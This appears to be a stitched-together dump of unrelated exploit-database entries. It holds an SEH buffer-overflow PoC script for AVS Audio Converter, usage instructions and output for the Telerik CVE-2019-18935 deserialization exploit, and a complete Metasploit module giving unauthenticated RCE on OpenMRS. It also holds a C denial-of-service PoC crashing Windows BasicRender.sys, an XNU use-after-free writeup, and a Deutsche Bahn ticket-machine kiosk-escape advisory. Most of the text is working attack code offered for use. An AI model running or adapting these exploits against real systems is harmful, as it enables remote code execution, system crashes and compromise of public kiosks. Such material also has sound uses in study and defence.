First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
42424242 ?? ???
0:000> !exchain
0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
0012fa30: 42424242
Invalid exception stack at 41414141
Note: EIP & ECX overwritten
Proof of Concept (PoC):
=======================
1. Download and install AVS Audio Converter
2. Open the AVS Audio Converter
3. Run the Python script, which creates a file (poc.txt)
4. Copy the characters found in the file (poc.txt) and paste them into the field "Exit folder"
5. Click on Browse
6. EIP is overwritten
'''
#!/usr/bin/python
buffer = "\x41" * 264
a = "\x42" * 4
b = "\x43" * 1000
poc = buffer + a + b
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).
Install
git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt
Requirements
This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.
Usage
Compile mixed mode assembly DLL payload
In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.
build_dll.bat sleep.c
Upload and load payload into application via insecure deserialization
Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.
python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
[*] Local payload name: sleep_2019121205271355_x86.dll
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll
{'fileInfo': {'ContentLength': 75264,
'ContentType': 'application/octet-stream',
'DateJson': '1970-01-01T00:00:00.000Z',
'FileName': '1576142987.918625.dll',
'Index': 0},
'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
'Telerik.Web.UI, Version=<VERSION>, '
'Culture=neutral, '
'PublicKeyToken=<TOKEN>',
'TempFileName': '1576142987.918625.dll'}}
[*] Triggering deserialization...
<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...
[*] Response time: 13.01 seconds
In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).
Thanks
@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'OpenMRS Java Deserialization RCE',
      'Description' => %q(
        OpenMRS is an open-source platform that supplies
        users with a customizable medical record system.
        There exists an object deserialization vulnerability
        in the `webservices.rest` module used in OpenMRS Platform.
        Unauthenticated remote code execution can be achieved
        by sending a malicious XML payload to a Rest API endpoint
        such as `/ws/rest/v1/concept`.
        This module uses an XML payload generated with Marshalsec
        that targets the ImageIO component of the XStream library.
        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
        8 and Java 9.
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Nicolas Serra', # Vuln Discovery and PoC
          'mpgn',          # PoC
          'Shelby Pace'    # Metasploit Module
        ],
      'References' =>
        [
          [ 'CVE', '2018-19276' ],
          [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
          [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
      'Platform' => [ 'unix', 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Targets' =>
        [
          [ 'Linux',
            {
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Platform' => [ 'unix', 'linux' ],
              'CmdStagerFlavor' => 'printf'
            }
          ]
        ],
      'DisclosureDate' => '2019-02-04',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Opt::RPORT(8081),
        OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
      ])

    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
  end

  def check
    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))

    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')

    response = res.get_html_document
    version = response.at('body//h3')
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text

    version_no = version.text
    version_no = version_no.match(/\d+\.\d+\.\d*/)
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no

    version_no = Gem::Version.new(version_no)
    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
    end

    CheckCode::Safe
  end

  def format_payload
    payload_data = payload.encoded.to_s.encode(xml: :text)
    payload_arr = payload_data.split(' ', 3)
    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
  end

  def read_payload_data(payload_cmd)
    # payload generated with Marshalsec
    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
    payload_data = File.binread(erb_path)
    payload_data = ERB.new(payload_data).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
  end

  def execute_command(cmd, opts={})
    cmd = cmd.encode(xml: :text)
    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
    payload_data = read_payload_data(xml_data)

    send_request_cgi(
      'method' => 'POST',
      'uri' => rest_uri,
      'headers' => { 'Content-Type' => 'text/xml' },
      'data' => payload_data
    )
  end

  def exploit
    chk_status = check
    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears

    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
      fail_with(Failure::NoTarget, 'Target is not vulnerable')
    end

    cmds = generate_cmdstager(:concat_operator => '&&')
    print_status('Sending payload...')
    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
  end
end
The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges.
The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code:
static int
wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
{
    ...
    error = falloc(p, &fp, &indx, ctx);
    if (error) goto cleanup;
    fp_alloc_successful = true;
    ...
    proc_fdlock(p);
    procfdtbl_releasefd(p, indx, NULL);
    fp_drop(p, indx, fp, 1);
    proc_fdunlock(p);
    ...
    error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
    if (error) goto cleanup;
    ...
cleanup:
    if (error) {
        if (fp_alloc_successful) fp_free(p, indx, fp);
        ...
    }
First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running.
This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else.
One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible.
The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified".
Tested on macOS 10.14.6 (18G87).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip
# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
# Date: 2019-12-20
# Exploit author: vportal
# Vendor homepage: http://www.microsoft.com
# Version: Windows 10 1803 x86
# Tested on: Windows 10 1803 x86
# CVE: N/A
# A null pointer dereference exists in the WARPGPUCMDSYNC function of the
# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
# to crash the system and deny service to the other users.
PoC:
#include <Windows.h>
#include <d3dkmthk.h>
#include <cstring>

int main(void)
{
    D3DKMT_CREATEDEVICE* device = NULL;
    device = new D3DKMT_CREATEDEVICE();
    D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
    D3DKMTEnumAdapters(&enumAdapter);
    device->hAdapter = enumAdapter.Adapters[1].hAdapter;
    // logger(log_counter, "EnumAdapter");  // author's logging helper, not part of the PoC
    D3DKMTCreateDevice(device);

    D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
    contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
    memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
    contextVirtual->hDevice = device->hDevice;
    char data[0x200] = { 0 };
    memset(data, 0xff, 0x200);
    contextVirtual->PrivateDriverDataSize = 0x200;
    contextVirtual->pPrivateDriverData = data;
    contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
    contextVirtual->Flags.InitialData = 0x000001;
    contextVirtual->Flags.NullRendering = 0x0;

    D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
    submitCommand = new D3DKMT_SUBMITCOMMAND();
    submitCommand->BroadcastContext[0] = 0x40000240;
    for (int i = 0; i < 0x10; i++)
        submitCommand->WrittenPrimaries[i] = 0x0;
    submitCommand->PresentHistoryToken = 0x100;
    submitCommand->Commands = 0x004b39;
    submitCommand->CommandLength = 0x00000d;
    // hContext is read from contextVirtual as in the original PoC; the
    // D3DKMTCreateContextVirtual call that would fill it in is not shown in the advisory.
    submitCommand->BroadcastContext[0] = contextVirtual->hContext;
    submitCommand->BroadcastContextCount = 0x1;
    submitCommand->Flags.PresentRedirected = 0x1;
    submitCommand->PrivateDriverDataSize = 0x130;

    char* PrivateData = NULL;
    PrivateData = new char[submitCommand->PrivateDriverDataSize];
    memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
    *(DWORD*)(PrivateData + 0x118) = 0x434e5953;  // "SYNC" tag, little-endian
    *(DWORD*)(PrivateData + 0x11c) = 0x18;
    *(DWORD*)(PrivateData + 0x120) = 0x000110;
    *(DWORD*)(PrivateData + 0x124) = 0x000420;
    *(DWORD*)(PrivateData + 0x128) = 0x0;
    *(DWORD*)(PrivateData + 0x12c) = 0x000428;
    submitCommand->pPrivateDriverData = PrivateData;

    D3DKMTSubmitCommand(submitCommand);
    return 0;
}
--------------------------------------------------------------------------
Crash dump:
STACK_TEXT:
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 BasicRender!WarpKMSubmitCommandVirtual+0x87
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
8afaea08 92b19db6 90114c30 8afaea68 b78da008 dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 dxgmms2!VidSchiSendToExecutionQueue+0x526
8afaeb90 92b764a9 00000000 945f5a80 00000000 dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 dxgmms2!VidSchiWorkerThread+0x1a1
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15
eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=bb26afd8
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
8fe8386c c7061060e88f mov dword ptr [esi],offset BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
Resetting default scope
--------------------------------------------------------------------------------
The vulnerability has only been tested in Windows 10 x86 1803.
CVSS Base Score: 5.5
Credit: Victor Portal
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Date: 2019-12-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
# Tested on: Windows XP
Document Title:
===============
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2191
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
Release Date:
=============
2019-12-14
Vulnerability Laboratory ID (VL-ID):
====================================
2191
Common Vulnerability Scoring System:
====================================
6.4
Vulnerability Class:
====================
Privilege Escalation
Product & Service Introduction:
===============================
Customers can buy tickets at our ticket machines at any time, regardless
of opening hours. Thus, the vending machine also
secures sales in rural areas.
- innovatively designed user guidance
- Real-time timetable information for rail traffic
- traveler information
- ticket paper supply
- free fault hotline: 0800 2886644
- Professional and contemporary maintenance
The ticket vending machine can also be configured according to
individual requirements. The housing can be designed as desired.
Customers can purchase their tickets with different means of payment.
User guidance is available in different languages.
(Copy of the Homepage:
https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a local kiosk
privilege escalation vulnerability in the Deutsche Bahn ticket vending
machine series running Windows XP.
Vulnerability Disclosure Timeline:
==================================
2019-12-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure Program
Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the
official Deutsche Bahn ticket vending machine series for Windows.
The security vulnerability allows local attackers to bypass the kiosk
mode and compromise the local file system and applications.
It is possible for local attackers to break out of the kiosk mode of the
Deutsche Bahn vending machine application if the Password Agent
(PasswordAgent.exe) of the system receives a timeout or has a runtime
error in the background. These errors can occur due to aborted sessions,
unclean logout or common errors when using the application at system
level.
In the event of a local error, attackers can bring the error message to
the foreground by pressing Cancel on the number field during a
transaction. After the error message becomes visible, the attacker can
click on a link in the error message where one can normally see what the
error report contains. The attacker is then redirected to a form in the
error message, where he can search for errors in a collection of
Microsoft articles via "Submit / Don't Submit" or another link on the
online path. Clicking it opens the web browser. From the web browser the
attacker opens the options menu, gains access to the local system
directory and is then able to compromise the ticket vending machine
running Windows XP.
The error message is normally deactivated on those devices through a
hardening process of the service provider. In this special case the
exception handling of Windows was not deactivated or moved to the
background, which allows the attacker to move through other options and
finally access the file system via the browser.
The ticket vending machine vulnerability requires no user interaction
and can only be exploited by local attackers with physical device
access. No keyboard or front loader opening is required.
Vulnerable System(s):
[+] Windows XP
Affected Component(s):
[+] Exception Handling (Error Message Content)
Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with
physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Sheet
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
=> Transaction Application => Cancel := Unexpected Error (Background) -
Runtime/Session/Timeout (Front)
=> Click Error Report => Click Search Collection => Web Browser => Local
File System => PWND!
What are attackers able to do once the file system of the vending
machine is accessible this way?
1. Inject local malware into the ticket machine (editor / debugger /
cmd / ps - e.g. ransomware/malware)
2. Local manipulation to assist skimming devices (transmit prepares)
3. Phishing of local credentials from the screen via the system (DB browser
application)
4. Intercept or manipulate card information (local file
system - sniff/extract)
5. Crash or freeze the computer system (e.g. kill a process / loop script)
6. Scare or joke activities (e.g. HTML / JS pushed to the front screen via the web
browser or a new window process)
Reference(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
Solution - Fix & Patch:
=======================
There are several problems related to system hardening that can be
resolved:
1. It should not be possible for users with system user rights to use
the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser,
messages & Co.)
4. Check that all other tasks are always running in the background or
are being moved there permanently
5. The Deutsche Bahn vending machine application and user interface
should be shut down in the event of persistent errors in the foreground
6. The activities of the test were logged but did not trigger
any alert for defensive purposes
Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
Security Risk:
==============
The security risk of the local ticket vending machine system
vulnerability is estimated as high. The escalation bug can be easily
exploited by local interaction with the touch display to access the file
system.
Credits & Authors:
==================
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team and the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com